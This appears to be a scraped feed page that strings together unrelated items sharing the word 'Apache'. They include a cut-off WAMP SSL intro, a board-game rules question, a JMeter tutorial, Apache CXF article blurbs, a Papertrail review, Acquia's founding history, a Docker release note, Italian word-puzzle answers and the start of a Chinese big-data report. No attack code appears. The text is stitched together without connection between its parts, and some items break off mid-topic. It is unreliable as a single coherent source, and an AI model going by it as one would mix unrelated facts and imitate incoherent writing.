Following the earlier post "Setting up a web server with WAMP", this article covers how to install the SSL service on WAMP. Developers run into things like payment flows, where testing in SSL mode becomes unavoidable. Concretely, the approach is to set up a CA service on your own machine and let your own host act as the certificate authority. The following articles are useful references: "Enabling the SSL Module on WAMP", "Enabling SSL on WAMP", and "Enable HTTPS on WAMP2". Judging from those write-ups, setting up SSL clearly splits into two parts: generating the SSL certificate and public key, and editing the Apache SSL configuration files.
          Anglomania Apache Blouse - Bronze   


          Thread: Thunderbolt Apache Leader:: Rules:: RQ-1, put this down and all pilots are Fast? Seems a bit OP. Am I doing this right?   

by Icedanno

The RQ-1 drone, rules say, "If the RQ-1 is at High Altitude, treat all our Pilots as being Fast."

That seems a bit... Overpowered. It's only 3 points!

Is this right?
          Load-testing Elasticsearch with Apache JMeter   

1. Download JMeter

Download: http://jmeter.apache.org/download_jmeter.cgi

After unpacking, run:

/apache-jmeter-3.2/bin
./jmeter

2. Add a thread group

Click Test Plan -> Add -> Threads -> Thread Group:

In the thread group, set the number of threads and users to simulate user traffic:

10 users, each with 200 threads, looping 10 times.

3. Add an HTTP request

Under the thread group, click Add -> Sampler -> HTTP Request:

In the HTTP request, specify the ES host, port, and the query command:

4. Add a report

Click Add -> Listener -> Summary Report:

Then save; this generates a .jmx file.

5. Run the test

Run it and check the results in the Summary Report:

Author: napoay, posted 2017/6/30 20:47:44 (original link)

          Developing Web services, part 3: building a file-upload Web service with Apache CXF   
This tutorial demonstrates how to develop a CXF Web service that uploads files submitted by users and stores them in a specific directory. The sample application is developed in the widely used Eclipse IDE.
          Deploying an Android client for JAX-RS Web services with Apache HttpClient   
Let's access a JAX-RS Web service using the Apache HttpClient library. RESTful Web services are easy to build in a Java environment with Jersey, the JAX-RS reference implementation. Android is a popular smartphone platform. This article builds a JAX-RS client on Android; specifically, it creates a client that uses the Apache HttpClient library to access a JAX-RS Web service.
          Logging Web-service messages with Apache CXF   
Logging can serve as a tool for monitoring and debugging applications. This article shows how to log Web-service messages with Apache CXF: the various ways to implement message logging, how to do it with key CXF features such as interceptors and features, and how to do it with Spring-based bean configuration.
          Developing Web services with Apache CXF and Aegis   
Aegis is one of the data-binding tools supported out of the box by the Apache CXF Web-service framework. Data binding maps between Java objects and XML documents. This article explains how to build a CXF-based Web service with Aegis and how to customize its data-binding behavior, with particular attention to the benefits of using Aegis and to customizing bindings with Aegis external mapping files.
          Java Web services: understanding WS-Policy   
WS-Policy provides a general-purpose structure for configuring the features and options that apply to a Web service. You will have seen it in this series' WS-Security configurations, as well as in other extension technologies such as WS-ReliableMessaging. This installment explains the structure of WS-Policy documents and how to attach policies to services in WSDL (Web Service Description Language), trying out a sample security configuration on Apache Axis2, Metro, and Apache CXF.
          Java Web services: the performance of WS-SecureConversation   
WS-SecureConversation lets you secure an ongoing exchange of Web-service messages with less processing overhead than plain WS-Security. This article shows how to configure and use WS-SecureConversation on three leading open-source Java Web-service stacks (Apache Axis2, Metro, and Apache CXF), and examines how their performance differs when using WS-SecureConversation.
          Java Web services: CXF performance compared   
Apache CXF shares some underlying components with Apache Axis2 and Metro, but it assembles them in a completely different architecture. In this installment of his Java Web services series, Dennis Sosnoski compares the performance of the CXF, Metro, and Axis2 stacks both with and without WS-Security.
          Using the Jackson JSON processor with Apache Wink   
Apache Wink is rapidly becoming one of the de facto implementations of the JAX-RS 1.0 specification. The standard Wink distribution includes providers such as JSON.org and Jettison for marshalling to and unmarshalling from JSON, but those providers have some trouble representing arrays and restrict the possible return types, which complicates coding JAX-RS services and the Ajax (Asynchronous JavaScript and XML) applications that act as their clients. This article shows how to configure an existing Wink-based Web application to use Jackson as its JSON provider, solving several of these problems. Using the sample code of a simple Jackson-enabled JAX-RS Web service, it discusses the strengths of the Jackson provider.
          Java Web services: WS-Security in CXF   
The Apache CXF Web-service stack supports WS-Security, including configuring security handling via WS-SecurityPolicy. CXF allows flexible configuration of the deployment parameters used at run time to implement security processing, and on the client side supports both static and dynamic configuration options. In this installment of the Java Web services series, Dennis Sosnoski shows how to use CXF for a simple UsernameToken WS-Security case and for one using signing and encryption.
          Java Web services: introducing CXF   
The Apache CXF Web-service stack supports JAXB 2.x data binding (along with alternative data bindings) and JAX-WS 2.x service configuration. Like the JAXB/JAX-WS combination introduced in earlier articles, CXF uses XML files to extend the JAX-WS configuration information. In this article, series author Dennis Sosnoski covers the basics of client and server development with CXF.
          Designing and developing SCA components with the Spring framework, part 1: Spring, SCA, and Apache Tuscany   
In this series, "Designing and developing SCA components with the Spring framework", you will learn how to combine Service Component Architecture (SCA) with the Spring framework effectively to build distributed service applications. This first installment outlines the benefits of combining SCA and Spring. Learn how to design and build SCA components using the Spring framework, how to expose Spring beans as SCA services, and how to access SCA services and properties from within a Spring application. The examples in this article use the Apache Tuscany SCA Java runtime.
          Got Logs? Get a PaperTrail: First thoughts   
I stumbled upon Papertrail through a Twitter Ad (hey, those things work sometimes!) and figured that I should take a quick look. Given the amount of work I've been doing around compliance management and deployment of distributed systems, this seems like it may be an interesting fit. Luckily, they have a free tier as well which means it's easy to kick the tires on it before diving in with a paid commitment.

The concept seems fairly easy:

The signup process was pretty seamless. I went to the pricing page to see what the plan levels are which also has the Free Plan – Sign Up button nicely planted center of screen:

What I really like about this product is the potential to go by data ingestion rather than endpoints for licensing. Scalability is a concern with pricing for me, so knowing that the amount of aggregate data drives the price was rather comforting to me.

The free tier gets a first month with lots of data followed by a 100 MB per month follow-on limit. That's probably not too difficult to cap out at, so you can easily see that people will be drawn to the $7 first paid tier, which ups the data to 1GB of storage and 1 year of retention. Clearly, at 7 days retention for the free tier, this is meant to just give you a taste and leave you looking for more if the usability is working for you.

First Steps and the User Experience

On completion of the first form, there is a confirmation email. You are also logged in immediately and ready to roll with the simple welcome screen:

Clicking the button to get started brings you to the instruction screen complete with my favorite (read: most despised) method of deploying which is pushing a script into a sudo bash pipe.

There is an option to run each script component individually, which is much preferred so you can see the details of what is happening.

Once you’ve done the initial setup process, you get a quick response showing you have active events being logged:

Basic logging is one thing for the system, so the next logical step is to up the game a bit and add some application level logging which is done using the remote-rsyslog2 collector. The docs and process to deploy are available inside the Papertrail site as well:

Now that I’ve got both by system and an application (I’ve picked the Apache error log as a source location) working, I’m redirected to see the live results in my Events screen (mildly censored to protect the innocent):

You can highlight some specific events and drill down into the different context views by highlighting and clicking anywhere in the events screen:

Searching the logs is pretty simple with a search bar that uses simple structured search commands to look for content. Searches are able to be saved and stored for reporting and repetitive use.

On the first pass, this looks like a great product and is especially important for you to think about as you look at how to aggregate logs for the purpose of search and retention for security and auditing.

The key will be making sure that you clearly define the firewall and VPC rules to ensure you have access to the remote server at Papertrail and then to make sure that you keep track of the data you need to retain. I’ve literally spent 15 minutes in the app and that was from first click to live viewing of system and application logs. All that and it’s free too.

There is a referral link which you can use here if you want to try it out.

Give it a try if you’re keen and let me know your experiences or other potential products that are freely available that could do the same thing. It’s always good to share our learnings with the community!


          Dries Buytaert: Acquia's first decade: the founding story   

This week marked Acquia's 10th anniversary. In 2007, Jay Batson and I set out to build a software company based on open source and Drupal that we would come to call Acquia. In honor of our tenth anniversary this week, I wanted to share some of the milestones and lessons that have helped shape Acquia into the company it is today. I hope that my record of Acquia's history not only pays homage to our incredible colleagues, customers and partners that have made this journey worthwhile, but that it offers honest insight into the challenges and rewards of building a company from the ground up.

A Red Hat for Drupal

In 2007, I was attending the University of Ghent working on my PhD dissertation. At the same time, Drupal was gaining momentum; I will never forget when MTV called me seeking support for their new Drupal site. I remember being amazed that a brand like MTV, an institution I had grown up with, had selected Drupal for their website. I was determined to make Drupal successful and helped MTV free of charge.

It became clear that for Drupal to grow, it needed a company focused on helping large organizations like MTV be successful with the software. A "Red Hat for Drupal", as it were. I also noticed that other open source projects, such as Linux, had benefited from well-capitalized backers like Red Hat and IBM. While I knew I wanted to start such a company, I had not yet figured out how. I wanted to complete my PhD first before pursuing business. Due to the limited time and resources afforded to a graduate student, Drupal remained a hobby.

Little did I know that at the same time, over 3,000 miles away, Jay Batson was skimming through a WWII Navajo Code Talker Dictionary. Jay was stationed as an Entrepreneur in Residence at North Bridge Venture Partners, a venture capital firm based in Boston. Passionate about open source, Jay realized there was an opportunity to build a company that provided customers with the services necessary to scale and succeed with open source software. We were fortunate that Michael Skok, a Venture Partner at North Bridge and Jay's sponsor, was working closely with Jay to evaluate hundreds of open source software projects. In the end, Jay narrowed his efforts to Drupal and Apache Solr.

If you're curious as to how the Navajo Code Talker Dictionary fits into all of this, it's how Jay stumbled upon the name Acquia. Roughly translating as "to spot or locate", Acquia was the closest concept in the dictionary that reinforced the ideals of information and content that are intrinsic to Drupal (it also didn't hurt that the letter A would rank first in alphabetical listings). Finally, the similarity to the word "Aqua" paid homage to the Drupal Drop; this would eventually provide direction for Acquia's logo.

Breakfast in Sunnyvale

In March of 2007, I flew from Belgium to California to attend Yahoo's Open Source CMS Summit, where I also helped host DrupalCon Sunnyvale. It was at DrupalCon Sunnyvale where Jay first introduced himself to me. He explained that he was interested in building a company that could provide enterprise organizations supplementary services and support for a number of open source projects, including Drupal and Apache Solr. Initially, I was hesitant to meet with Jay. I was focused on getting Drupal 5 released, and I wasn't ready to start a company until I finished my PhD. Eventually I agreed to breakfast.

Over a baguette and jelly, I discovered that there was overlap between Jay's ideas and my desire to start a "RedHat for Drupal". While I wasn't convinced that it made sense to bring Apache Solr into the equation, I liked that Jay believed in open source and that he recognized that open source projects were more likely to make a big impact when they were supported by companies that had strong commercial backing.

We spent the next few months talking about a vision for the business, eliminated Apache Solr from the plan, talked about how we could elevate the Drupal community, and how we would make money. In many ways, finding a business partner is like dating. You have to get to know each other, build trust, and see if there is a match; it's a process that doesn't happen overnight.

On June 25th, 2007, Jay filed the paperwork to incorporate Acquia and officially register the company name. We had no prospective customers, no employees, and no formal product to sell. In the summer of 2007, we received a convertible note from North Bridge. This initial seed investment gave us the capital to create a business plan, travel to pitch to other investors, and hire our first employees. Since meeting Jay in Sunnyvale, I had gotten to know Michael Skok who also became an influential mentor for me.

Jay and me on one of our early fundraising trips to San Francisco.

Throughout this period, I remained hesitant about committing to Acquia as I was devoted to completing my PhD. Eventually, Jay and Michael convinced me to get on board while finishing my PhD, rather than doing things sequentially.

Acquia, my Drupal startup

Soon thereafter, Acquia received a Series A term sheet from North Bridge, with Michael Skok leading the investment. We also selected Sigma Partners and Tim O'Reilly's OATV from all of the interested funds as co-investors with North Bridge; Tim had become both a friend and an advisor to me.

In many ways we were an unusual startup. Acquia itself didn't have a product to sell when we received our Series A funding. We knew our product would likely be support for Drupal, and evolve into an Acquia-equivalent of the RedHat Network. However, neither of those things existed, and we were raising money purely on a PowerPoint deck. North Bridge, Sigma and OATV mostly invested in Jay and me, and the belief that Drupal could become a billion dollar company that would disrupt the web content management market. I'm incredibly thankful for Jay, North Bridge, Sigma and OATV for making a huge bet on me.

Receiving our Series A funding was an incredible vote of confidence in Drupal, but it was also a milestone with lots of mixed emotions. We had raised $7 million, which is not a trivial amount. While I was excited, it was also a big step into the unknown. I was convinced that Acquia would be good for Drupal and open source, but I also understood that this would have a transformative impact on my life. In the end, I felt comfortable making the jump because I found strong mentors to help translate my vision for Drupal into a business plan; Jay and Michael's tenure as entrepreneurs and business builders complimented my technical strength and enabled me to fine-tune my own business building skills.

In November 2007, we officially announced Acquia to the world. We weren't ready, but a reporter had caught wind of our stealth startup and forced us to unveil Acquia's existence to the Drupal community with only 24 hours notice. We scrambled and worked through the night on a blog post. Reactions were mixed, but generally very supportive. I shared in that first post my hopes that Acquia would accomplish two things: (i) form a company that supported me in providing leadership to the Drupal community and achieving my vision for Drupal and (ii) establish a company that would be to Drupal what Ubuntu or RedHat were to Linux.

An early version of Acquia.com, with our original logo and tagline. March 2008.

The importance of enduring values

It was at an offsite in late 2007 where we determined our corporate values. I'm proud to say that we've held true to those values that were scribbled onto our whiteboard 10 years ago. The leading tenet of our mission was to build a company that would "empower everyone to rapidly assemble killer websites".

[Image: Acquia vision]

In January 2008, we had six people on staff: Gábor Hojtsy (Principal Acquia engineer, Drupal 6 branch maintainer), Kieran Lal (Acquia product manager, key Drupal contributor), Barry Jaspan (Principal Acquia engineer, Drupal core developer) and Jeff Whatcott (Vice President of Marketing). Because I was still living in Belgium at the time, many of our meetings took place screen-to-screen:

[Image: typical work day]

Opening our doors for business

We spent a majority of the first year building our first products. Finally, in September of 2008, we officially opened our doors for business. We publicly announced commercial availability of the Acquia Drupal distribution and the Acquia Network. The Acquia Network would offer subscription-based access to commercial support for all of the modules in Acquia Drupal, our free distribution of Drupal. This first product launched closely mirrored the Red Hat business model by prioritizing enterprise support.

We quickly learned that in order to truly embrace Drupal, customers would need support for far more than just Acquia Drupal. In the first week of January 2009, we relaunched our support offering and announced that we would support all things related to Drupal 6, including all modules and themes available on drupal.org as well as custom code.

This was our first major turning point; supporting "everything Drupal" was a big shift at the time. Selling support for Acquia Drupal exclusively was not appealing to customers, however, we were unsure that we could financially sustain support for every Drupal module. As a startup, you have to be open to modifying and revising your plans, and to failing fast. It was a scary transition, but we knew it was the right thing to do.

Building a new business model for open source

Exiting 2008, we had launched Acquia Drupal, the Acquia Network, and had committed to supporting all things Drupal. While we had generated a respectable pipeline for Acquia Network subscriptions, we were not addressing Drupal's biggest adoption challenges; usability and scalability.

In October of 2008, our team gathered for a strategic offsite. Tom Erickson, who was on our board of directors, facilitated the offsite. Red Hat's operational model, which primarily offered support, had laid the foundation for how companies could monetize open source, but we were convinced that the emergence of the cloud gave us a bigger opportunity and helped us address Drupal's adoption challenges. Coming out of that seminal offsite we formalized the ambitious decision to build Drupal Gardens and Acquia Hosting. Here's why these two products were so important:

Solving for scalability: In 2008, scaling Drupal was a challenge for many organizations. Drupal scaled well, but the infrastructure companies required to make Drupal scale well was expensive and hard to find. We determined that the best way to help enterprise companies scale was by shifting the paradigm for web hosting from traditional rack models to the then emerging promise of the "cloud".

Solving for usability: In 2008, CMSs like Wordpress and Ning made it really easy for people to start blogging or to set up a social network. At the time, Drupal didn't encourage this same level of adoption for non-technical audiences. Drupal Gardens was created to offer an easy on-ramp for people to experience the power of Drupal, without worrying about installation, hosting, and upgrading. It was one of the first times we developed an operational model that would offer "Drupal-as-a-service".

[Image: Acquia roadmap]

Fast forward to today, and Acquia Hosting evolved into Acquia Cloud. Drupal Gardens evolved into Acquia Cloud Site Factory. In 2008, this product roadmap to move Drupal into the cloud was a bold move. Today, the Cloud is the starting point for any modern digital architecture. By adopting the Cloud into our product offering, I believe Acquia helped establish a new business model to commercialize open source. Today, I can't think of many open source companies that don't have a cloud offering.

Tom Erickson takes a chance on Acquia

Tom joined Acquia as an advisor and a member of our Board of Directors when Acquia was founded. Since the first time I met Tom, I always wanted him to be an integral part of Acquia. It took some convincing, but Tom eventually agreed to join us full time as our CEO in 2009. Jay Batson, Acquia's founding CEO, continued on as the Vice President at Acquia responsible for incubating new products and partnerships.

Moving from Europe to the United States

In 2010, after spending my entire life in Antwerp, I decided to move to Boston. The move would allow me to be closer to the team. A majority of the company was in Massachusetts, and at the pace we were growing, it was getting harder to help execute our vision all the way from Belgium. I was also hoping to cut down on travel time; in 2009 I flew 100,000 miles in just one year (little did I know that come 2016, I'd be flying 250,000 miles!).

This is a challenge that many entrepreneurs face when they commit to starting their own company. Initially, I was only planning on staying on the East Coast for two years. Moving 3,500 miles away from your home town, most of your relatives, and many of your best friends is not an easy choice. However, it was important to increase our chances of success, and relocating to Boston felt essential. My experience of moving to the US had a big impact on my life.

Building the universal platform for the world's greatest digital experiences

Entering 2010, I remember feeling that Acquia was really 3 startups in one; our support business (Acquia Network, which was very similar to Red Hat's business model), our managed cloud hosting business (Acquia Hosting) and Drupal Gardens (a WordPress.com based on Drupal). Welcoming Tom as our CEO would allow us to best execute on this offering, and moving to Boston enabled me to partner with Tom directly. It was during this transformational time that I think we truly transitioned out of our "founding period" and began to emulate the company I know today.

The decisions we made early in the company's life, have proven to be correct. The world has embraced open source and cloud without reservation, and our long-term commitment to this disruptive combination has put us at the right place at the right time. Acquia has grown into a company with over 800 employees around the world; in total, we have 14 offices around the globe, including our headquarters in Boston. We also support an incredible roster of customers, including 16 of the Fortune 100 companies. Our work continues to be endorsed by industry analysts, as we have emerged as a true leader in our market. Over the past ten years I've had the privilege of watching Acquia grow from a small startup to a company that has crossed the chasm.

With a decade behind us, and many lessons learned, we are on the cusp of yet another big shift that is as important as the decision we made to launch Acquia Hosting and Drupal Gardens in 2008. In 2016, I led the project to update Acquia's mission to "build the universal platform for the world's greatest digital experiences". This means expanding our focus, and becoming the leader in building digital customer experiences. Just like I openly shared our roadmap and strategy in 2009, I plan to share our next 10 year plan in the near future. It's time for Acquia to lay down the ambitious foundation that will enable us to be at the forefront of innovation and digital experience in 2027.

A big thank you

Of course, none of these results and milestones would be possible without the hard work of the Acquia team, our customers, partners, the Drupal community, and our many friends. Thank you for all your hard work. After 10 years, I continue to love the work I do at Acquia each day — and that is because of you.


          Release of the Docker 17.06 container virtualization management system   
The release of Docker 17.06 has been announced: a toolkit for managing isolated Linux containers that provides a high-level API for manipulating containers at the level of isolating individual applications. Docker lets you run arbitrary processes in isolation without worrying about assembling the container's contents, and then move and clone the containers built for those processes to other servers, taking over all the work of creating, servicing and maintaining the containers. The toolkit builds on the Linux kernel's standard isolation mechanisms: namespaces and control groups (cgroups). Docker's code is written in the Go language and is distributed under the Apache 2.0 license.
          A special November on the beach, and Zerovero's new address   

I don't know whether we should thank the Azores anticyclone,
or El Niño, or simply St. Martin's summer.
We are watching quite a different show from
"la nebbia a gl'irti colli piovigginando sale"
(Carducci's mist climbing, drizzling, up the bristling hills)

even on the beach at Riccione!

Webcam on the Riccione beach



Below continues the list of Zerovero solutions, since the previous dedicated page
was starting to suffer from elephantiasis.

23.12.2015 "Bandiera gialla" and commedia all'italiana lead to the final between Tacco - DODICI - Apostoli.
Modest traffic: 362 page views with 136 returning visits.

24.12.2015 An easy pre-Christmas chain, ending between Chiusura - LAMPO - Genio.
Modest traffic: 229 page views with just 68 returning visits. The holiday effect.

25.12.2015 A Christmas chain in keeping with the solution between Bicicletta - CAMPANELLO - Allarme.
Very easy at Christmas: only 252 page views for 101 returning visits.

28.12.2015 A dull chain with the final link between Capelli - SPUNTATA - Pallottola.
The usual difficulty, the usual arrivals: 366 page views with 140 returning visits.

29.12.2015 Thanks to "fuori esercizio" and the sound barrier; the solving link between Bilancio - VOCE - Alzare.
Not such an immediate conclusion: 502 page views and 173 returning visits.

30.12.2015 The "teatro sociale" leads today to the triple Biscotti - FORTUNA - Cieca.
Modest traffic: 366 page views with 158 returning visits.

31.12.2015 A note of brown colour brings us to the link between Moneta - ORO - Orso.
Fair, middling: as usual, 389 page views with 141 returning visits.

01.01.2016 An easy chain (accelerating adjective) with a thankless final between Acqua - CIOCCOLATO - Tavoletta.
Bitter, demanding chocolate: 597 page views with 203 returning visits.

04.01.2016 Thanks to a "Siberian education" we reach the solution between Caraffa - FILTRANTE - Passaggio.
Fair traffic: 660 page views with 213 returning visits.

05.01.2016 Without a time machine there is no reaching the link between Senso - ORGANO - Tastiera.
Good traffic: 689 page views with 242 returning visits.

06.01.2016 A chain without traps, with the link between Monaco - ALBERTO - Lupo.
Nothing shameful: 420 page views with 164 returning visits.

07.01.2016 A blanket search leads to the final between Motore - TESTATA - Giornale.
Fair traffic: 641 page views with 231 returning visits.

08.01.2016 Getting past Nile fever we arrive at the link between Sigaretta - CARTINA - Politica.
Fair visits: 481 page views with 213 returning visits.

11.01.2016 No choice but to pass by the triumph of Bacchus to reach the link between Battaglia - SOMME - Tirare.
Fair traffic, a hard battle: 626 page views with 219 returning visits.

12.01.2016 A flying saucer leads to today's solution between Presentarsi - SBARRA - Attrezzo.
Not such an immediate conclusion: 523 page views and 225 returning visits.

13.01.2016 Cat-eyes-ham leads to the solution between Orlando - MAGIC - Mike.
No easy solution: 599 page views and 234 returning visits.

14.01.2016 Easy chains with the final link between Pollo - CESTELLO - Lavatrice.
An easy solution, with 472 page views and 174 returning visits.

15.01.2016 At the end of the day, the chequered flag leads to the solution between Sorelle - SETTE - Porta.
Fair traffic: 608 page views with 225 returning visits.

18.01.2016 A somewhat Ticino-leaning chain, concluding between Bicicletta - BELLEZZE - Naturali.
A fair puzzle; normal traffic: 557 page views and 216 returning visits.

19.01.2016 An easy run right to the end between Pianta - FUSTO - Benzina.
Not such an immediate conclusion: 564 page views and 236 returning visits.

20.01.2016 A rather unintuitive chain with the final link between Club - SANDWICH - Isole.
Better than fair visits: 644 page views, with 239 returning visits.

21.01.2016 Thanks to Bertoli's "Pescatore" we reach the solution between Anello - COMPAGNIA - Bella.
It looks like a season ticket: 543 page views, with 211 returning visits.

22.01.2016 Donkey stew and Milanese-style asparagus usher in the final between Peccato - MORTALE - Comune.
Despite the difficulty, only 518 page views and 217 returning visits today.

25.01.2016 An easy chain concluding between Sparare - MUCCHIO - Selvaggio.
An easy solution, with 450 page views and 184 returning visits.

26.01.2016 Passing through "piazza della foca" we arrive at the link between Vento - BAVA - Gnocchi.
A difficult final solution: 868 page views and 257 returning visits.

27.01.2016 A quick chain and the final link between Anima - COLPO - Aria.
Not such an immediate conclusion: 686 page views and 259 returning visits.

28.01.2016 Half a hawk ushers in today's solution between Sud - BENVENUTI - Pugile.
Not easy: 593 page views and 239 returning visits.

29.01.2016 Easy chain(s) with the final triple between Vena - PORTA - Entrata.
An easy solution, with 447 page views and 191 returning visits.

01.02.2016 The mountain lion ushers in the closing solution between Pura - COINCIDENZA - Treno.
Difficulty at the high end of normal, with 687 page views and 267 returning visits.

02.02.2016 A somewhat Ticino-leaning chain (Campo Blenio), resolving between Dente - RADICE - Matematica.
A laborious final solution: 805 page views and 300 returning visits.

03.02.2016 An easy, direct route to the link between Riso - BALDO - Giovane.
Moderately demanding: 607 page views and 245 returning visits.

04.02.2016 A deceptive chain with the link between Leventina - SOBRIO - Stile.
A demanding, difficult final solution: 802 page views and 275 returning visits.

05.02.2016 A classic chain with an original solution between Sangue - MENTE - Calcolatrice.
Not such an immediate conclusion: 635 page views and 249 returning visits.

08.02.2016 "La meglio gioventù" was out of sorts in finding the link between Motore - FOLLE - Parto.
Not such an easy conclusion: 585 page views and 234 returning visits.

09.02.2016 An unambiguous chain up to the link between Pagare - ROMANA - Lattuga.
Normal difficulty, with 417 page views and 172 returning visits.

10.02.2016 An easy chain with the final link between Fifa - SIGLA - Musicale.
It looks like a season ticket: 601 page views, with 247 returning visits.

11.02.2016 A classic-style chain with the solution between Legno - SCHEGGIA - Veloce.
It really does look like a season ticket: 608 page views, with 250 returning visits.

12.02.2016 "Sì Signore" and "Piano B" for the final link between Disegno - TECNICO - Commissario.
Not such an immediate conclusion: 720 page views and 247 returning visits.

15.02.2016 Four seats and the bogeyman lead to the solution between Papa - SILVESTRO - Gatto.
No easy conclusion, as usual: 630 page views and 239 returning visits.

16.02.2016 Neon, 10, Maradona, Santa get us to the solution between Acqua - MATERASSO - Squadra.
Difficulty at the high end of normal, with 701 page views and 253 returning visits.

17.02.2016 "Notte Museo" and "Piccolo Diavolo" lead to the final solution between Prato - FIORITO - Linguaggio.
Modest difficulty, with 498 page views and 197 returning visits.

18.02.2016 Mary_Queen_Mercury_Codice resolves between Onore - PICCHETTO - Tenda.
Nothing shameful: as usual, 587 page views with 237 returning visits.

19.02.2016 Mathematics is not an opinion, but it resolves the final link between Meccanica - MORSA - Freddo.
Difficulty never seen before, traffic at its peak with 2171 page views and a full 573 returning visits.

22.02.2016 No easy chain, with the solution between Apollo - NAVICELLA - Incenso.
A convoluted final produces 1025 page views and 336 returning visits.

23.02.2016 "Something is rotten in the state of Denmark" leads to the solution between Uovo - POSIZIONE - Guerra.
A demanding final generates 1148 page views and 320 returning visits.

24.02.2016 A heart of stone ushers in the link between Parata - MAZZIERE - Casinò.
Monstrous: a record traffic peak with 2654 page views and a full 690 returning visits.

25.02.2016 "Io & Marley" leads to the solution between Artificiali - LACRIME - Scoppiare.
Nothing shameful: as usual, 634 page views with 267 returning visits.

26.02.2016 The fish comic strip suggests the final link between Muovere - CRITICHE - Condizioni.
Modest, average difficulty, with 572 page views and 243 returning visits.

29.02.2016 Rare cooking eases the elusive solution between Calciatore - NANI - Giardino.
Contained difficulty, close to average, with 527 page views and 257 returning visits.

01.03.2016 Gioco - Mulino smooths the way to the solution between Lavagna - LUMINOSA - Intensità.
Undemanding: as usual, 542 page views with 218 returning visits.

02.03.2016 "Pianeta Donna" is the prelude to the link between Indiano - APACHE - Elicottero.
Normal difficulty, with 532 page views and 223 returning visits.

03.03.2016 Jovanotti's "Piove" leads to the elusive link between Fedi - PAGGETTO - Taglio.
Tricky and demanding: indeed 1271 page views with 401 returning visits.

04.03.2016 Brenno-Blenio-Voce resolves the brand-new chain with the link between Fuoco - MEZZOGIORNO - Italia.
It really does look like a season ticket: 670 page views, with 254 returning visits.


The next Zerovero solutions are to be found at the foot of the post of Saturday 5 March 2016.
I invite you to update your bookmarks.



          Sr. Software Engineer - ARCOS LLC - Columbus, OH   
Oracle, PostgreSQL, C, C++, Java, J2EE, JBoss, HTML, JSP, JavaScript, Web services, SOAP, XML, ASP, JSP, PHP, MySQL, Linux, XSLT, AJAX, J2ME, J2SE, Apache,...
From ARCOS LLC - Tue, 13 Jun 2017 17:31:59 GMT - View all Columbus, OH jobs
          Unravel Data Adds Native Support for Impala and Kafka   
Unravel Data, the Application Performance Management (APM) platform designed for Big Data, announced that it has integrated support for Cloudera Impala and Apache Kafka into its platform, allowing users to derive the maximum value from those applications. Unravel continues to offer the only full-stack solution that doesn’t just monitor and unify system-level data, but rather tracks, correlates, and interprets performance data across the full-stack in order to optimize, troubleshoot, and analyze from a single pane.
          Bug in the Apache Maven Javadoc Plugin   
          Episode 24: But is it Web Scale?   

This week Ben Edmunds calls in from Portland and Phil Sturgeon calls in from THE FUTURE. They are joined by Steve Corona to discuss Scaling PHP.

Most of this conversation centers around Phil and Ben’s horrible facial hair with a few questions thrown Steve’s way to educate us on getting the most out of your LAMP stack. The main takeaways are to stop using Apache and to start using Postgres.

Go buy Steve’s book Scaling PHP if you want to be Web Scale.


          Xinghe Rongkuai: the 2017 global big data industry report, overseas edition   

As the opening article of this series, this installment surveys the overall ecosystem of the big data industry from a macro perspective: data collection, distributed storage and processing, and the data analysis, visualization and industry applications built on top of them. Each subsequent article will pick around five verticals and dozens of representative companies to introduce in detail, and will work through the logic and concrete cases of one key vertical. First, then: how did big data technology come about?


Part 1: The technical foundations of big data

As early as 1980, the futurist Alvin Toffler, in The Third Wave, enthusiastically hailed "big data" as "the cadenza of the third wave", marking the first time people had a preliminary sense of the value massive data could generate.

But because of the limits of connectivity, for a long time data was applied mostly to in-house business intelligence. Only with the spread of the internet and mobile internet could companies finally connect directly with users and obtain large volumes of behavioral and consumption data, and only then did the contours of the big data industry's applications gradually become clear.

In the early 2000s Google, needing to crawl and store information from a huge number of web pages, build indexes and rank them, while keeping hardware procurement costs down, gradually worked out a distributed storage and computing architecture built from ordinary commodity machines. Known through MapReduce and GFS, it allowed big data to be stored across multiple databases and processed with massive parallelism, solving the problem that a single machine had too little storage and took too long to compute to be practical.

Based on the paper Google published at the end of 2003, a former Yahoo engineer developed Hadoop, a similar distributed storage and computing technology; a vast ecosystem then grew up around Hadoop, steadily maturing the big data infrastructure.

Hadoop's functionality covers the whole pipeline, from data collection, storage and analysis to data transfer and on to presentation. HDFS provides distributed data storage; HBase provides the database function; Flume performs data collection; Sqoop moves and governs data; MapReduce performs algorithmic distributed computation; Hive serves as the data warehouse; Pig handles data-flow processing; ZooKeeper provides feedback collection and load-balancing services across nodes; and Ambari lets administrators see how the whole architecture is running.



The Hadoop ecosystem architecture

As the technology developed, databases and processing software adapted to particular application scenarios proliferated. The non-relational database MongoDB, with its rather strong conditional queries and flexible data model, has been widely adopted; Spark replaces Hadoop's storage medium with flash memory and gains a hundredfold increase in processing speed, and Databricks Cloud is the productized service on that architecture.

Beyond this, many other technical paths exist in the big data ecosystem. MPP, still based mainly on relational databases, has goals similar to Hadoop's: split the data, compute independently, then aggregate. Compared with SQL on Hadoop, MPP offers a higher degree of data optimization and faster computation and excels at cross analysis, making it well suited to enterprise analytics; but it scales less well than Hadoop (beyond roughly 10 nodes its computational advantage fades), and its closed-source architecture makes it more dependent on specific hardware.

A representative company using the MPP storage model is Teradata, whose enterprise data analysis helps staff spend less energy and money on big data processing, letting companies focus more on running the business. Amid the wave of acquisitions by traditional database companies and by enterprise-software companies intent on entering the database market (such as SAP), Teradata is one of the few large independent data-analysis companies left on the market.

Part 2: Where big data comes from

In 2011 McKinsey published a report titled "Big Data: The Next Frontier for Innovation, Competition and Productivity", noting that US companies with more than 1,000 employees stored on average over 200 TB of data, and that mining its value could unlock the potential of many industries and companies. The report marked the start of the commercial big data boom, and it made enterprise software the earliest source of big data.

As storage and computing power grew and China's domestic big data industry took off, some practitioners, while seeing the industry's huge prospects, also realized how scarce domestic data resources were. High-value data on livelihoods, telecoms, transport and electricity is held by government and large state-owned enterprises and is not open, so obtaining data sources became an even bigger problem than improving processing methods.

The market data in China that can currently be de-identified and used still comes mainly from single channels and scenarios such as phones and PCs; TalkingData and Umeng, along with analysis and consulting firms such as iResearch and Analysys, depend heavily on these resources and are also constrained by them. Because government data is sensitive, only a few organizations can connect to it. As demand for data intensifies and the value of data resources gains gradual acceptance, government data is expected to become an important component of data sources.

